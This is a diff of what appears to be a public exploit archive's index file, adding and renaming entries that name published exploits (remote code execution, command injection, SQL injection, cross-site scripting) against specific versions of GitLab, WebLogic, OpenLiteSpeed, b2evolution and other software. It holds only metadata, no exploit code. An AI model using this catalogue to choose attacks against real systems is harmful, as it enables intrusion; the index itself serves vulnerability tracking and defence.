-49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,
+49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated) (2)",2020-12-24,"Norbert Hofmann",webapps,ruby,
 49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
 49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
 49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
@@ -43690,7 +43689,7 @@ id,file,description,date,author,type,platform,port
 49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
 49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
 49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
-49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
+49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,
 49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
 49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
 49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
@@ -43742,3 +43741,8 @@ id,file,description,date,author,type,platform,port
 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
 49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
+49553,exploits/php/webapps/49553.txt,"PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting",2021-02-11,"Anmol K Sachan",webapps,php,
+49554,exploits/php/webapps/49554.txt,"b2evolution 6.11.6 - 'redirect_to' Open Redirect",2021-02-11,"Nakul Ratti",webapps,php,
+49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php,
+49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
+49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,